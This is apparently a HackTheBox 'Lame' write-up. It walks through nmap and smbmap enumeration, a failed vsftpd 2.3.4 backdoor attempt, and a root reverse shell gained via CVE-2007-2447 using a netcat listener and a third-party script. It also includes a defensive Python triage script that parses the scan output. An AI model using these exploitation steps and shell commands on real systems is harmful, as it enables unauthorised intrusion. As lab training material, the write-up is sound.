
HackTheBox - Lame

Following on from Legacy, it was time to complete Lame, the first of many Linux machines. The machine required simple enumeration and another SMB exploit, resulting in a root shell.

Machine IP =



Starting Nmap 7.80 ( ) at 2020-07-19 16:41 BST
Nmap scan report for
Host is up (0.053s latency).
Not shown: 996 filtered ports
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

From the scan we can see FTP is open on port 21 and SSH on port 22. Furthermore, SMB is open on ports 139 and 445.


Anonymous Login (FTP)

FTP anonymous login is enabled; however, on checking, the directory is empty.


After some googling, it turns out vsftpd 2.3.4 is commonly backdoored, so I decided to see if there are any FTP exploits associated with vsftpd 2.3.4 using searchsploit.

root@kali:~/Desktop# searchsploit vsftpd 2.3.4
----------------------------------------- ----------------------------------------
 Exploit Title                           |  Path
                                         | (/usr/share/exploitdb/)
----------------------------------------- ----------------------------------------
vsftpd 2.3.4 - Backdoor Command Executio | exploits/unix/remote/17491.rb
----------------------------------------- ----------------------------------------
Shellcodes: No Result

This looks promising, so I will come back to it later.


Anonymous Login (SMB)

smbmap shows the tmp share is accessible (read and write) without credentials.

root@kali:~/Desktop# smbmap -H
[+] Finding open SMB ports....
[+] User SMB session established on
[+] IP:	Name:                                        
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	tmp                                               	READ, WRITE	oh noes!
	opt                                               	NO ACCESS	
	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))

At first I was unable to connect using smbclient, but after some googling I added client min protocol=NT1 to /etc/samba/smb.conf, which lets smbclient fall back to the SMB1 (NT1) dialect that this old Samba build speaks.

However, the directory did not yield anything interesting.


Moving on, I decided to search for Samba 3 in searchsploit.

root@kali:~/Desktop# searchsploit Samba 3.0
-------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                        |  Path
                                                                                      | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------- ----------------------------------------
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                  | exploits/osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                | exploits/multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)      | exploits/unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)                    | exploits/linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                | exploits/linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)              | exploits/solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow                              | exploits/linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)                     | exploits/multiple/dos/
Samba 3.0.4 - SWAT Authorisation Buffer Overflow                                      | exploits/linux/remote/
Samba < 3.0.20 - Remote Heap Overflow                                                 | exploits/linux/remote/7701.txt
-------------------------------------------------------------------------------------- ----------------------------------------

A wide range of exploits is available, including command execution via "Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)", which matches the Samba 3.0.20-Debian version reported by smbmap.
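As an added check that is not part of the original writeup, the following Python script parses the nmap and smbmap output shown above and flags the findings a defender would prioritise for remediation: anonymous FTP, the vsftpd 2.3.4 build, a share writable without credentials, and a Samba version inside the range the searchsploit entry lists. The sample input is constructed from the lines above with the target address omitted.

```python
import re

# Constructed sample input: nmap and smbmap lines from this writeup, embedded so it runs offline.
NMAP_OUTPUT = """\
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
"""
SMBMAP_OUTPUT = """\
\tDisk\tPermissions\tComment
\tprint$\tNO ACCESS\tPrinter Drivers
\ttmp\tREAD, WRITE\toh noes!
\topt\tNO ACCESS\t
\tIPC$\tNO ACCESS\tIPC Service (lame server (Samba 3.0.20-Debian))
"""
SERVICE_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s+(.*)$")
SHARE_RE = re.compile(r"^\s*(\S+)\s+(NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY)\s*(.*)$")
SAMBA_VER_RE = re.compile(r"Samba (\d+\.\d+\.\d+)")

def parse_nmap(text):  # open TCP port -> (service name, version banner)
    services = {}
    for line in text.splitlines():
        m = SERVICE_RE.match(line)
        if m:
            services[int(m.group(1))] = (m.group(2), m.group(3).strip())
    return services

def parse_smbmap(text):  # (share, permissions, comment) rows; header row does not match
    return [(m.group(1), m.group(2), m.group(3).strip())
            for m in map(SHARE_RE.match, text.splitlines()) if m]

def triage(nmap_text, smbmap_text):  # findings a defender would want to remediate
    findings = []
    if "Anonymous FTP login allowed" in nmap_text:
        findings.append("anonymous FTP login enabled")
    for port, (_, banner) in parse_nmap(nmap_text).items():
        if banner.startswith("vsftpd 2.3.4"):
            findings.append(f"port {port}: vsftpd 2.3.4, a build known to carry a backdoor")
    for share, perms, comment in parse_smbmap(smbmap_text):
        if "WRITE" in perms:
            findings.append(f"share {share} is writable without credentials")
        m = SAMBA_VER_RE.search(comment)
        if m:
            # Affected range taken from the searchsploit entry above: 3.0.20 < 3.0.25rc3.
            ver = tuple(int(x) for x in m.group(1).split("."))
            if (3, 0, 20) <= ver < (3, 0, 25):
                findings.append(f"Samba {m.group(1)} is in the CVE-2007-2447 affected range")
    return findings
```

Run `triage(NMAP_OUTPUT, SMBMAP_OUTPUT)` to get the four findings for this host; point the two constants at real nmap and smbmap output to reuse it elsewhere.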


Exploiting VSFTPD

I started by searching msfconsole for any exploits associated with vsftpd.

msf5 > search vsftpd 2.3.4

Matching Modules

   #  Name                                                      Disclosure Date  Rank       Check  Description
   -  ----                                                      ---------------  ----       -----  -----------
   0  auxiliary/gather/teamtalk_creds                                            normal     No     TeamTalk Gather Credentials
   1  exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution
   2  exploit/multi/http/struts2_namespace_ognl                 2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   3  exploit/unix/ftp/vsftpd_234_backdoor                      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

exploit/unix/ftp/vsftpd_234_backdoor looks interesting, but sadly it was unsuccessful.

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] - Banner: 220 (vsFTPd 2.3.4)
[*] - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > 

After looking into this exploit a little more, I found that the backdoor is triggered by attempting to log in with a username that has :) appended to the end of it, such as anonymous:).

Exploiting Samba

When googling Samba 3 Username remote code execution, CVE-2007-2447 comes up. Further googling provided a Python script.

Following the script's installation instructions gave an easy shell. First, start a netcat listener:

nc -nvlp 443

and then execute the Python script:

root@kali:~/Desktop/CVE-2007-2447# python 139 443
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

On the netcat listener we now have a connection as root.

root@kali:~/Desktop/CVE-2007-2447# nc -nvlp 443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 59119
uid=0(root) gid=0(root)

Now we spawn a nicer shell with Python and start searching for the flags.

python -c 'import pty; pty.spawn("bash")'

Flag Hunting

The flags were actually rather easy to find.


root@lame:/home/makis# cat user.txt
cat user.txt


root@lame:/root# cat root.txt
cat root.txt

Understanding the Python Script

This post is licensed under CC BY 4.0 by the author.